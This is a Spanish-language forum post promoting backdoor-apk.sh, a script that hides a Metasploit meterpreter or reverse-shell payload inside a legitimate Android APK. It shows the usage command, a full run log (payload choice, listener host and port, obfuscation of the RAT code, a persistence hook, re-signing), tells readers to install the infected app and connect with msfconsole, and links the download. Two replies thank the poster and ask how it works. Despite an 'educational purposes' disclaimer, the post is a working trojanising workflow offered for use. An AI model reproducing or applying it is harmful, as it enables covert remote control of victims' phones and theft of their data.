(http://seclist.us/wp-content/uploads/2016/09/Backdoor-Apk-v0-1-4.jpg)
Bakcdoor-APK es un script que simplifica el proceso de agregar un backdoor a cualquier APK para Android. Para utilizar este script, es necesario que los usuarios tengan conocimientos de Linux, Bash, Metasploit, Apktool, el SDK de android, smali, etc.
La idea de este script es mantenerlo lejos del alcance de gente mal intencionada. Es solo para propositos educativos.
Uso:
./backdoor-apk.sh BaiduBrowser.apk ________
/ ______ \
|| _ _ ||
||| || ||| AAAAAA PPPPPPP KKK KKK
|||_||_||| AAA AAA PPP PPP KKK KKK
|| _ _o|| (o) AAA AAA PPP PPP KKKKKK
||| || ||| AAAAAAAA PPPPPPPP KKK KKK
|||_||_||| AAA AAA PPP KKK KKK
||______|| AAA AAA PPP KKK KKK
/__________\
________|__________|__________________________________________
/____________\
|____________| Dana James Traversie
[*] Running backdoor-apk.sh v0.1.7 on Wed Nov 30 22:30:34 EST 2016
[+] Android payload options:
1) meterpreter/reverse_http 4) shell/reverse_http
2) meterpreter/reverse_https 5) shell/reverse_https
3) meterpreter/reverse_tcp 6) shell/reverse_tcp
[?] Please select an Android payload option: 2
[?] Please enter an LHOST value: 10.6.9.31
[?] Please enter an LPORT value: 443
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.El APK recompilado funcionará en el directorio original de la APK que infectamos. Ahora solo es necesario instalar el APK en alguna terminal de Android y correrla.
Ahora podremos conectarnos por meterpreter con el script generado:
msfconsole -r backdoor-apk.rc
Descarga: https://github.com/dana-at-cp/backdoor-apk
Espero que les sea de utilidad.
ANTRAX
Wow, se ve muy interesante! Hacerlo todo a mano lleva un tiempo muy valioso y después de tres o cuatro veces se hace un tanto tedioso, le echaré un vistazo, gracias!! :)
Pregunta!!, el backdoor apk ,descompila el apk oh lo hace con apktool y el source del apk lo une y genera el backdoor ahora esto lo hace con, cualquier apk es decir firmas y certificadas,?